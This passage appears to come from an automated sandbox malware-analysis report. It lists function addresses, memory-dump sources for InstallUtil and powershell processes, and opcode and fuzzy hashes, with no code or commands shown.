                                                  • Opcode ID: c2b41a4e2db64f392581f182ba0b8236db76d5894cae8f9da7bdc97bc0ec731d
                                                  • Instruction ID: 55718442f9daa1b67b092a48ff0ba4db6eb67d4099046344bb579c6c560fabab
                                                  • Opcode Fuzzy Hash: c2b41a4e2db64f392581f182ba0b8236db76d5894cae8f9da7bdc97bc0ec731d
                                                  • Instruction Fuzzy Hash: 3CF0B49068EA851FD7C2B3B490272EDBBE2FF8625178541FAD04DC7193C80E8C45D752
                                                  Function 00007FF887C1AD2B Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f34ce0b9eb32562d33aacc1c60877665a5bda08072a35c9105502e71202487d
                                                  • Instruction ID: 3dfb1291a7230a52ba547194235691f985cf3097f069f800ac44c22a4c67f1ec
                                                  • Opcode Fuzzy Hash: 7f34ce0b9eb32562d33aacc1c60877665a5bda08072a35c9105502e71202487d
                                                  • Instruction Fuzzy Hash: 64F0C260D4EF8A5FE396A7B8442A1B96AE2FF4635170841FAC84DCF2A3D8180C05C326
                                                  Function 00007FF887C1A243 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ae9d3318cf68e0a0519b7f420df75e72a2d225b0dfe6bc6c9dd226156208bc2
                                                  • Instruction ID: 45e7ebcfdc83f7a3cc27f8011386cdc4e546dc96781e8249fae21fe3ddadeec2
                                                  • Opcode Fuzzy Hash: 9ae9d3318cf68e0a0519b7f420df75e72a2d225b0dfe6bc6c9dd226156208bc2
                                                  • Instruction Fuzzy Hash: 53F0B4A098EA866FE38AE7B484666F8B6E1FF46350B0904FDD50EC7593CC1D0C458713
                                                  Function 00007FF887C18702 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3ef8be2366d4e4a765dcf90916840d721d23da2863d3efab05fdf98e651be6e
                                                  • Instruction ID: 70382e547a1b2dfb855f5470cfa8f0b5e9fa0c32789760de7b4ca239449b01e7
                                                  • Opcode Fuzzy Hash: e3ef8be2366d4e4a765dcf90916840d721d23da2863d3efab05fdf98e651be6e
                                                  • Instruction Fuzzy Hash: 0CE012628CE6CC4ADB6266259C6509C7FB1BF02180F4D02F6E55CCB0D7FE495958C392
                                                  Function 00007FF887C19489 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8988d0c2bf40fb01b243d09758e8e081b18c7a41850101f1473fc1b31e43db66
                                                  • Instruction ID: e40459efffb5790ebbcf16a50d2ca915a4a69a1a892bdd430ce54616f7417d6a
                                                  • Opcode Fuzzy Hash: 8988d0c2bf40fb01b243d09758e8e081b18c7a41850101f1473fc1b31e43db66
                                                  • Instruction Fuzzy Hash: 72E0CD3184994F5FD741EB54E8061FCB7F1FF95260F0001B6D41ED7083DD2919568201
                                                  Function 00007FF887C108F1 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b07ec90383e28f057f05c5a7dfafb0a075cd9f98cc40bd1b814042c093c09b4f
                                                  • Instruction ID: 42f2b817aff6914e84614c8fd0b696aaf726aa6de6ab47c944221bb9d453900b
                                                  • Opcode Fuzzy Hash: b07ec90383e28f057f05c5a7dfafb0a075cd9f98cc40bd1b814042c093c09b4f
                                                  • Instruction Fuzzy Hash: 71D0126288E6CD0FE723576898610DD7F70FF52140F4D01E7D4A8C6093E84E566DC362
                                                  Function 00007FF887C1ACBC Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a316eaf49565cc0a26067399230cc8376d529af634b5c17a86e630639a0bb21
                                                  • Instruction ID: 1a369de8716c47d24117ae87c9c7cd47d1f938933e974e74a929c8305b245c47
                                                  • Opcode Fuzzy Hash: 7a316eaf49565cc0a26067399230cc8376d529af634b5c17a86e630639a0bb21
                                                  • Instruction Fuzzy Hash: ADE092B0819A496FE782ABF494155EDBBF1FF05210B4401BAD44DC7192DA384880C701
                                                  Function 00007FF887C1AC83 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f80ce4633881f30d485bacdec4ff33bcdb05c54d0d993712b342b8e976210916
                                                  • Instruction ID: 519d0cb14404d0e8424129a3c7d932637baab6e30e1394391d2bbe7f68e65320
                                                  • Opcode Fuzzy Hash: f80ce4633881f30d485bacdec4ff33bcdb05c54d0d993712b342b8e976210916
                                                  • Instruction Fuzzy Hash: 00E08090E4D9892FD342A7B480251DD66E1FF45651F5441F9D00DC7167D82C4C41C795
                                                  Function 00007FF887C121E8 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a619c17c2905d3a92fce8e2b94fc7919de5660f2cdeb4f6c87355e59c87d3c5a
                                                  • Instruction ID: 6ef1103e4046a8cf13e6ed23db977a18e245e6bdb060229cf21eddab9beb5692
                                                  • Opcode Fuzzy Hash: a619c17c2905d3a92fce8e2b94fc7919de5660f2cdeb4f6c87355e59c87d3c5a
                                                  • Instruction Fuzzy Hash: CDE0C23084AA804FD356A734802B5687BE0FF5A25178940FDC4068F1B2DA2D1881CA00
                                                  Function 00007FF887C1392C Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 983eb93d895522995e11999760db35e8eac82b81b8c7c8e0ee6537241a9ebbd7
                                                  • Instruction ID: 331d7c5cbc9aa25577eed57ccda93015dcaf770b23b5a8ab4275f2d2b42679db
                                                  • Opcode Fuzzy Hash: 983eb93d895522995e11999760db35e8eac82b81b8c7c8e0ee6537241a9ebbd7
                                                  • Instruction Fuzzy Hash: 24E0B63065CB808BD744E648C46192EB3E2FBD8780F400438E14AC3291CA64FC008742

                                                  Non-executed Functions

                                                  Function 00007FF887C1056F Relevance: 5.3, Strings: 4, Instructions: 342COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L_^z$L_^|$_$;@L_^
                                                  • API String ID: 0-3467470733
                                                  • Opcode ID: b24e0860b319872143af68dc491e8ffc6ad052a5de6dad2748c167288787821a
                                                  • Instruction ID: 89d06b31d31cb8fb6ef378491d7a02ec4aa546b18d341a4842a60750ed2a5430
                                                  • Opcode Fuzzy Hash: b24e0860b319872143af68dc491e8ffc6ad052a5de6dad2748c167288787821a
                                                  • Instruction Fuzzy Hash: F191C117A4D6524AE71176ADF8461FD3B60FF813F5B084177E6ACCA093DD4860CA86E3
                                                  Function 00007FF887C1A39A Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.2743369288.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_7ff887c10000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H$p[$p[$p[
                                                  • API String ID: 0-2617595817
                                                  • Opcode ID: 64f3faf43b40831713fbbe105880ae25a5ed9a028aa074ab1213bd5f1d1d1adf
                                                  • Instruction ID: 1261d943f99ac7b1f24b34b334e02a6824b9f7183e3d978551d3470d92d31b40
                                                  • Opcode Fuzzy Hash: 64f3faf43b40831713fbbe105880ae25a5ed9a028aa074ab1213bd5f1d1d1adf
                                                  • Instruction Fuzzy Hash: B8310621E4DE4A0FE39AA6B8942A2BD62F3FFC9790B4400BDC40ECB1D3DD1C5C029256

                                                  Executed Functions

                                                  Function 00007FF887BF33B5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.2192598823.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_7ff887bf0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction ID: 255a9ccd49b2207cd72e3c15fbc9546c5b366580925d49dcdc5a769f2080e8e0
                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction Fuzzy Hash: 8801677115CB0C4FDB44EF0CE451AA9B7E0FB99364F10056DE58AC3651DA36E882CB46

                                                  Non-executed Functions

                                                  Function 00007FF887BF06C0 Relevance: 7.6, Strings: 6, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.2192598823.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_7ff887bf0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (0%$8,%$H1%$P/%$-%$/%
                                                  • API String ID: 0-3071332584
                                                  • Opcode ID: 6d3cc5af1ec88cbe661761127a5cc0453b5834eb3f60e67538861589ee8b4ff9
                                                  • Instruction ID: 164db8767a04d61d1d71b4107894352634b681c15507805f33144ad6fac44e84
                                                  • Opcode Fuzzy Hash: 6d3cc5af1ec88cbe661761127a5cc0453b5834eb3f60e67538861589ee8b4ff9
                                                  • Instruction Fuzzy Hash: C821C522D8F9C14FE25A46B438192396FB1BF52E91B5880FBD09C871EBD8489919D742
                                                  Function 00007FF887BF02AD Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.2192598823.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_7ff887bf0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d$@J%$]$p@9$x.%
                                                  • API String ID: 0-3630579387
                                                  • Opcode ID: 2cf72930adb02961c59df4a4ad44fd9fb764b26ca96fa4a22ce7b71d9777e199
                                                  • Instruction ID: 288511b49fd5f1198a73a727daec0da6d917bc863d02933eea2d3130c849ad30
                                                  • Opcode Fuzzy Hash: 2cf72930adb02961c59df4a4ad44fd9fb764b26ca96fa4a22ce7b71d9777e199
                                                  • Instruction Fuzzy Hash: 3971C563C4EAC14FE25B45A83C151796EB2FF56E5079880FBC0DC8B1EBE8859D49D342